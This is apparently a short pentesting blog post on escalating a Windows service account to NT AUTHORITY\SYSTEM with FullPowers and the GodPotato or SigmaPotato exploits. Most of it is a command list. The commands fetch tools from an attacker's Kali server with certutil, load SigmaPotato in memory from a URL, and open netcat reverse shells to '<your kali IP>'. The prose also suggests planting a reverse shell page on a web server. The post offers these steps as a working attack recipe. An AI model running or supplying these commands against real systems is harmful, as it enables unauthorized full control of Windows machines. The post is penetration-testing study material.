Post

Restore Windows privilege and escalate to NT AUTHORITY\SYSTEM

Posted
By iptracej 1 min read

Introduction

I have encountered a good situation to learn one of Windows privilege escalation techniques by restoring the current privileges back to the default ones (including SeImpersonatePrivilege) and exploiting it with Potato family to escalate to NT AUTHORITY\SYSTEM.

I will not cover the details of the exploits here. You can read them at the links below.

Assumption

First, you should be as a Local Service or Network Service user. If you are in a normal user, think it through how you could escalate it to a Local Service or Network Service user. You could check if any typical service privilege escalation techniques can be leveraged. When a web server is running with local service, you could put a reverse shell script page in the web page and open the page via browser :)

Privilege Escalation Commands

Then, you could try:

  • Restore the default privileges including SeImpersonatePrivilege with FullPowers.exe.
  • Use GodPotato or SigmaPotato exploits to escalate the privilege to NT AUTHORITY\SYSTEM.

Here is a list of the commands.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37

# https://itm4n.github.io/localservice-privileges/
# https://github.com/itm4n/FullPowers

# Kali 
>sudo python3 -m http.server 80
# Target
>certutil -urlcache -split -f http://<your kali IP>/FullPowers.exe
>whoami /priv
>FullPowers.exe 
# or 
>FullPowers.exe -x 
>whoami /priv

# Once you see SeImpersonatePrivilege
# Run GodPotato with netcat 
# https://github.com/BeichenDream/GodPotato 

# Kali
>rlwrap nc -nlvp 1234
# Target 
>certutil -urlcache -split -f http://<your kali IP>/GodPotato-NET4.exe
>certutil -urlcache -split -f http://<your kali IP>/nc.exe
>GodPotato-NET4.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe <your kali IP> 1234"

# OR 

# Run SigmaPotato.exe with reverse shell option
# https://github.com/tylerdotrar/SigmaPotato

# Target
>powershell
>[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http://<your kali IP>/SigmaPotato.exe"))

# Kali 
>rlwrap nc -nlvp 1234
# Target 
>[SigmaPotato]::Main(@("--revshell","<your kali IP>","1234"))

Happy Hacking!

Pentesting, Windows, Privilege Escalation
Pentesting Windows Privilege Escalation GodPotato FullPowers SigmaPotato
This post is licensed under CC BY 4.0 by the author.